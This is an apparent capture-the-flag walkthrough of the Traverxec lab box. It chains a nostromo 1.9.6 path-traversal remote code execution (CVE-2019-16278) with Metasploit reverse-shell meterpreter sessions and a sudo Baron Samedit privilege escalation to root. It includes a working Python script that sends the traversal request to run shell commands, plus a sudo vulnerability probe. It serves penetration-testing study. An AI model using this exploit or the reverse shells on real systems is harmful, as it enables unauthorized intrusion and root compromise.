Traverxec

From RCATs
Start with a version scan of the target. Only SSH and a nostromo 1.9.6 web server are exposed, so the web server is the obvious way in.

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-22 20:47 MST
Nmap scan report for 10.129.28.145
Host is up (0.061s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 aa99a81668cd41ccf96c8401c759095c (RSA)
|   256 93dd1a23eed71f086b58470973a388cc (ECDSA)
|_  256 9dd6621e7afb8f5692e637f110db9bce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.76 seconds

Check whether nostromo 1.9.6 has any public exploits.

❯ searchsploit nostromo
--------------------------------------------------------------------- --------------------------
 Exploit Title                                                       |  Path
--------------------------------------------------------------------- --------------------------
Nostromo - Directory Traversal Remote Command Execution (Metasploit) | multiple/remote/47573.rb
nostromo 1.9.6 - Remote Code Execution                               | multiple/remote/47837.py
nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution | linux/remote/35466.sh
--------------------------------------------------------------------- --------------------------
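The first two hits are the same bug, CVE-2019-16278: nhttpd rejects paths containing `/../`, but it runs that check before it strips the `%0d` (carriage return) from each segment, so `.%0d./` slips past and decodes to `../`, walking up to `/bin/sh`, which the server then executes as a CGI with the POST body on its stdin. The third entry is the older 1.9.3 traversal that was patched before 1.9.6; the 2019 bug is a bypass of that fix. The script below is an added example, not code from this writeup or from the listed exploits: it rebuilds the raw request that 47837.py and the Metasploit module send, and gives a non-destructive check (run `id`, look for `uid=`) you can use before loading Metasploit. The target IP is taken from the command line; `build_request`, `looks_exploited`, `run_command` and `check` are names chosen here.

```python
import re
import socket
import sys

# Added example (not the writeup's or the exploit authors' code).
# Path used by EDB 47837 and the Metasploit nostromo_code_exec module for
# CVE-2019-16278: each ".%0d./" is "../" with a carriage return spliced in.
# nhttpd's "/../" check runs before the %0d is stripped, so the check passes
# and the decoded path resolves to /bin/sh.
TRAVERSAL_PATH = "/.%0d./.%0d./.%0d./.%0d./bin/sh"

# `id` output from a Unix shell, e.g. "uid=33(www-data) gid=33(www-data) ..."
UID_RE = re.compile(rb"uid=\d+\([^)]*\)")


def build_request(cmd: str) -> bytes:
    """Raw HTTP/1.0 POST whose body is handed to /bin/sh as a script.

    The public exploits send "Content-Length: 1" regardless of body size:
    nhttpd only needs a positive length to accept the POST, and sh reads its
    script from stdin without looking at CONTENT_LENGTH. The two leading
    echos are carried over from the Metasploit module and are harmless.
    """
    body = f"echo\necho\n{cmd} 2>&1"
    head = f"POST {TRAVERSAL_PATH} HTTP/1.0\r\nContent-Length: 1\r\n\r\n"
    return head.encode() + body.encode()


def looks_exploited(response: bytes) -> bool:
    """True when the reply is the raw output of `id`, not an HTTP error page.

    A vulnerable server hands the socket to /bin/sh, so what comes back is the
    command's stdout with no HTTP status line at all. A patched server answers
    with a normal HTTP response, which never contains a uid=...(...) token.
    """
    if response.startswith(b"HTTP/"):
        return False
    return UID_RE.search(response) is not None


def run_command(host: str, port: int, cmd: str, timeout: float = 10.0) -> bytes:
    """Send one command and collect everything the server writes back."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(cmd))
        while True:
            try:
                data = s.recv(4096)
            except socket.timeout:
                break
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def check(host: str, port: int = 80) -> bool:
    """Non-destructive check: run `id` and see whether shell output comes back."""
    return looks_exploited(run_command(host, port, "id"))


if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit(f"usage: {sys.argv[0]} <target-ip> [port]")
    host = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    print("vulnerable" if check(host, port) else "not vulnerable")
```

Because sh writes straight to the socket, a successful reply has no HTTP headers at all; that absence is itself a strong signal, and `looks_exploited` uses it to avoid mistaking an error page that happens to echo the request for command output.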

Load the matching Metasploit module (multi/http/nostromo_code_exec). The bug gives command execution through /bin/sh, so the module takes a cmd/unix payload; the Python meterpreter is the most capable of those and works here because the box has Python installed.

msf6 exploit(multi/http/nostromo_code_exec) > set payload payload/cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp

msf6 exploit(multi/http/nostromo_code_exec) > exploit

[*] Started reverse TCP handler on 10.10.16.19:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/python/meterpreter/reverse_tcp command payload
[*] Sending stage (24380 bytes) to 10.129.28.145
[*] Meterpreter session 2 opened (10.10.16.19:4444 -> 10.129.28.145:40198) at 2022-12-22 20:52:07 -0700

meterpreter > getuid
Server username: www-data
meterpreter > background
[*] Backgrounding session 2...

Run multi/recon/local_exploit_suggester against the www-data session to look for a privilege escalation path.

msf6 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf6 post(multi/recon/local_exploit_suggester) > exploit

 #   Name                                                                Potentially Vulnerable?  Check Result
 -   ----                                                                -----------------------  ------------
 1   exploit/linux/local/cve_2022_0995_watch_queue                       Yes                      The target appears to be vulnerable.
 2   exploit/linux/local/su_login                                        Yes                      The target appears to be vulnerable.
 3   exploit/linux/local/sudo_baron_samedit                              Yes                      The target appears to be vulnerable. sudo 1.8.27 is a vulnerable build.
 4   exploit/linux/local/ubuntu_enlightenment_mount_priv_esc             Yes                      The target appears to be vulnerable.

sudo 1.8.27 looks like a good target. The suggester is flagging CVE-2021-3156 (Baron Samedit), a heap overflow in sudoedit's argument handling that was fixed in 1.9.5p2. Two caveats: the suggester's verdict is based only on the version string, and Debian backports security fixes without bumping the upstream version, so a patched box can still be reported as vulnerable; and the exploit is a heap overflow, so a failed attempt crashes sudo rather than giving a shell. Of the other hits, su_login needs a known password and the enlightenment module is Ubuntu-specific on what nmap identified as Debian 10, so this is the cheapest thing to try.
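Before running a memory-corruption exploit it is worth confirming the target is really unpatched. The script below is an added example, not part of this writeup or of the Metasploit module: it reproduces the version-range test the suggester performs (affected releases per the sudo advisory for CVE-2021-3156 are 1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1) and adds the behaviour-based probe from the Qualys advisory, `sudoedit -s /` run as an unprivileged user, which reports `sudoedit:` on vulnerable builds and `usage:` on fixed ones regardless of what the version string says. The function names and the `probe_local` helper are chosen here.

```python
import re
import subprocess

# Added example (not the writeup's or the Metasploit module's code).
# Affected ranges for CVE-2021-3156 per the sudo advisory: legacy 1.8.2
# through 1.8.31p2 and stable 1.9.0 through 1.9.5p1. 1.9.5p2 is the fix.
VULNERABLE_RANGES = (
    ((1, 8, 2, 0), (1, 8, 31, 2)),
    ((1, 9, 0, 0), (1, 9, 5, 1)),
)

# "1.8.27", "1.9.5p2": major.minor.patch with an optional "p<n>" level.
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_sudo_version(text: str) -> tuple:
    """Pull (major, minor, patch, p_level) out of `sudo --version` output."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no sudo version found in {text!r}")
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def version_says_vulnerable(text: str) -> bool:
    """Version-string test, the same kind of check the suggester module does.

    This can false-positive on distributions that backport the fix without
    changing the upstream version (Debian does this), so treat a True here
    as "worth probing", not as proof.
    """
    v = parse_sudo_version(text)
    return any(lo <= v <= hi for lo, hi in VULNERABLE_RANGES)


def classify_sudoedit_probe(output: str) -> str:
    """Classify the output of `sudoedit -s /` run as an unprivileged user.

    Vulnerable builds accept -s together with a file argument and get as far
    as complaining about the file ("sudoedit: /: not a regular file"); fixed
    builds reject the option combination up front and print usage.
    """
    lines = output.strip().splitlines()
    first = lines[0] if lines else ""
    if first.startswith("sudoedit:"):
        return "vulnerable"
    if first.startswith("usage:"):
        return "patched"
    return "unknown"


def probe_local() -> tuple:
    """Run both checks on this host. Returns (version_vulnerable, probe_result)."""
    ver = subprocess.run(["sudo", "--version"], capture_output=True, text=True)
    probe = subprocess.run(["sudoedit", "-s", "/"], capture_output=True, text=True)
    return (
        version_says_vulnerable(ver.stdout),
        classify_sudoedit_probe(probe.stdout + probe.stderr),
    )


if __name__ == "__main__":
    by_version, by_probe = probe_local()
    print(f"version string says vulnerable: {by_version}")
    print(f"sudoedit -s / probe says: {by_probe}")
```

Run it as the low-privilege user you already have (www-data here); the probe needs no password and does not trigger the overflow, so it is safe to run before committing to the exploit. If the two answers disagree, trust the probe.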

msf6 exploit(linux/local/sudo_baron_samedit) > exploit

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: python
[*] Started reverse TCP handler on 10.10.16.19:4443
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. sudo 1.8.27 is a vulnerable build.
[*] Writing '/tmp/KpNJLxj9J.py' (763 bytes) ...
[*] Writing '/tmp/libnss_UTY8j/N .so.2' (548 bytes) ...
[*] Sending stage (3045348 bytes) to 10.129.28.145
[+] Deleted /tmp/KpNJLxj9J.py
[+] Deleted /tmp/libnss_UTY8j/N .so.2
[+] Deleted /tmp/libnss_UTY8j
[*] Meterpreter session 3 opened (10.10.16.19:4443 -> 10.129.28.145:47712) at 2022-12-22 21:06:24 -0700

The architecture warning is harmless here: the module does not inject into the Python meterpreter process, it only needs the session to drop a Python script and a fake NSS library in /tmp and run the script, and the staged payload it sends (about 3 MB) is a native Linux meterpreter, which is why the new session is a separate process. The module also cleans up its own files, but the crash-prone nature of the overflow means it is worth checking /tmp afterwards if an attempt fails partway.
meterpreter > getuid                                       
Server username: root